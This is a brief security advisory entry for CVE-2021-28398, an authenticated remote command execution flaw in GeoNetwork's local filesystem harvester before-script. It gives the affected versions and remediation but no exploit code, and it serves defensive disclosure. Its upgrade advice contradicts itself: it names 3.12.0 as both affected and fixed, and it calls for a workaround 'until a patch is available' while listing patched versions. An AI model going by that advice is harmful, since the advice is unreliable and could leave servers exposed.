CVE-2021-28398

Name of the Vulnerable Software and Affected Versions GeoNetwork versions 3.4.0 through 3.12.0 GeoNetwork versions 4.0.0 through 4.0.3

Description A privileged attacker can use the directory harvester before-script to execute arbitrary OS commands remotely on the hosting infrastructure. This requires a User Administrator or Administrator account. The issue occurs in the runBeforeScript method in harvesters/src/main/java/org/fao/geonet/kernel/harvest/harvester/localfilesystem/LocalFilesystemHarvester.java.

Recommendations For GeoNetwork versions 3.4.0 through 3.12.0, update to version 3.12.0 or later. For GeoNetwork versions 4.0.0 through 4.0.3, update to version 4.0.4 or later. As a temporary workaround, consider disabling the runBeforeScript method in the LocalFilesystemHarvester class until a patch is available.